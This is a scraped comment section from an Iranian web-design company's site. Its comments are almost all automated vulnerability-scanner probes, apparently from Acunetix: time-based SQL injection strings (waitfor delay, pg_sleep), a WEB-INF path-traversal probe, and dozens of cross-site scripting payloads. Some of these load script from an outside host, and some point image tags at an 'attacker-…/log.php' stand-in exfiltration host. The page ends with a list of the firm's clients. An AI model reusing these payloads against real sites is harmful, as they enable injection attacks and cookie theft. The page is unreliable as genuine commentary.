//www.vulnweb.com در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۱نوشت:

1

\\ در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۱نوشت:

1

WEB-INF\\web.xml? در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۱نوشت:

1

ZJ0MjY17'; waitfor delay '0:0:3' -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۱نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

1

/\\www.vulnweb.com در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

1

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_989709

ZQHMvNp0'); waitfor delay '0:0:3' -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

1

@@UIIlS در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

1

DZ0HOseP')); waitfor delay '0:0:6' -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۲نوشت:

1

JyI= در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۳نوشت:

1

foI1z0ND';select pg_sleep(6); -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۳نوشت:

1

lW8BaOFX');select pg_sleep(6); -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۳نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۳نوشت:

1

soJNXZX3'));select pg_sleep(6); -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۴نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۴نوشت:

1

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۴نوشت:

acu2789<s1﹥s2ʺs3ʹuca2789

(select convert(int,CHAR(65))) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۵نوشت:

1

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۵نوشت:

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۶نوشت:

acu163%6xuca163AAAAA

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۷نوشت:

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(923775)</ScRiPt>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۹نوشت:

TicketBtn=ثبت نظر<script>prompt(920530)</script>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۰نوشت:

TicketBtn=ثبت نظر<ScR<ScRiPt>IpT>prompt(999390)</sCr<ScRiPt>IpT>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۱نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(935906)</ScRiPt>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۱نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968907></ScRiPt>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<\0ScRiPt >prompt(919969)</ScRiPt>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<video><source onerror="javascript:prompt(994031)">

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۳نوشت:

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۴نوشت:

TicketBtn%3D%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1%3Csvg%20onload%3Dprompt(968950)%3E

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۵نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<div style=width:expression(prompt(956903))>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۵نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='933047'>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۶نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<body onload=prompt(971706)>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903494)>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=xyz OnErRor=prompt(973792)>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img/src=">" onerror=alert(935190)>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۸نوشت:

TicketBtn%3d%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1<ScRiPt%20>prompt(922666)</sCripT>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt>prompt(934081)</sCripT>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۱۹نوشت:

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<input autofocus onfocus=prompt(970115)>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۱نوشت:

<a HrEF=http://www.vulnweb.com></a>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۱نوشت:

<a HrEF=jaVaScRiPT:>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۲نوشت:

[url=http://www.vulnweb.com][/url]

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img<!-- --> src=x onerror=alert(944205);//><!-- -->

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1}body{acu:Expre/**/SSion(prompt(907991))}

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_6U6vT <ScRiPt >prompt(970562)</ScRiPt>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۵نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ifRAme sRc=910021.com></IfRamE>

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۶نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img sRc='http://attacker-992655/log.php?

cgnlrtxg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۷نوشت:

1

cgnlrtxg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۷نوشت:

1

cgnlrtxg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۸نوشت:

1

sample%40email.tst'"()&%<acx><ScRiPt >prompt(915882)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۲۹نوشت:

1

'"()&%<acx><ScRiPt >prompt(975327)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۰نوشت:

1

sample%40email.tst_916451 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۰نوشت:

1

acu9272<s1﹥s2ʺs3ʹuca9272 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۳نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۴نوشت:

1

acu122%6xuca122AAAAA در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۵نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۶نوشت:

1

sample%40email.tst<ScRiPt >prompt(939198)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۷نوشت:

1

sample@email.tst<script>prompt(945738)</script> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۸نوشت:

1

sample@email.tst<ScR<ScRiPt>IpT>prompt(978557)</sCr<ScRiPt>IpT> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۹نوشت:

1

sample%40email.tst<ScRiPt >prompt(903365)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۳۹نوشت:

1

sample%40email.tst<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960721></ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۰نوشت:

1

sample%40email.tst<\0ScRiPt >prompt(929042)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۰نوشت:

1

sample%40email.tst<video><source onerror="javascript:prompt(962700)"> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۱نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۲نوشت:

1

sample%2540email.tst%3Csvg%20onload%3Dprompt(989294)%3E در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۲نوشت:

1

sample%40email.tst<div style=width:expression(prompt(991875))> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۳نوشت:

1

sample%40email.tst<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXR در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۴نوشت:

1

sample%40email.tst<body onload=prompt(974935)> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۴نوشت:

1

sample%40email.tst<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933606)> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۵نوشت:

1

sample%40email.tst<img src=xyz OnErRor=prompt(993193)> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۵نوشت:

1

sample%40email.tst<img/src=">" onerror=alert(916312)> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۶نوشت:

1

sample%2540email.tst<ScRiPt%20>prompt(927172)</sCripT> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۶نوشت:

1

sample%40email.tst<ScRiPt>prompt(958578)</sCripT> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۷نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۷نوشت:

1

sample%40email.tst<input autofocus onfocus=prompt(932553)> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۸نوشت:

1

<a HrEF=http://www.vulnweb.com></a> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۸نوشت:

1

<a HrEF=jaVaScRiPT:> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۴۹نوشت:

1

[url=http://www.vulnweb.com][/url] در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۰نوشت:

1

sample%40email.tst<img<!-- --> src=x onerror=alert(957051);//><!-- --> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۰نوشت:

1

sample%40email.tst}body{acu:Expre/**/SSion(prompt(907361))} در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۱نوشت:

1

sample%40email.tst_x1iFX <ScRiPt >prompt(945327)</ScRiPt> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۱نوشت:

1

sample%40email.tst<ifRAme sRc=993456.com></IfRamE> در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۲نوشت:

1

sample%40email.tst<img sRc='http://attacker-905205/log.php? در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۵۳نوشت:

1

آخرین شرکتهای طرف قرارداد

دارولند

طراحی فروشگاه اینترنتی

آف مکس

طراحی سایت تخفیف گروهی

نمایندگان بیمه ما

طراحی وب سایت و پورتال نمایندگان

پژند الکترونیک

طراحی وب سایت و پرتال

نمایندگی بوش

طراحی وب سایت شرکتی

ایران بزرگ

طراحی وب سایت، اتوماسیون اداری و خدمات شبکه پایگاه خبری ایران بزرگ

ستون فقرات تهران

طراحی پورتال تخصصی پزشکی ستون فقرات تهران

آخرین توییت ها

آخرین مقالات آموزشی

استفاده از تکنولوژی روز دنیا در شرکت فناوران راتا رایان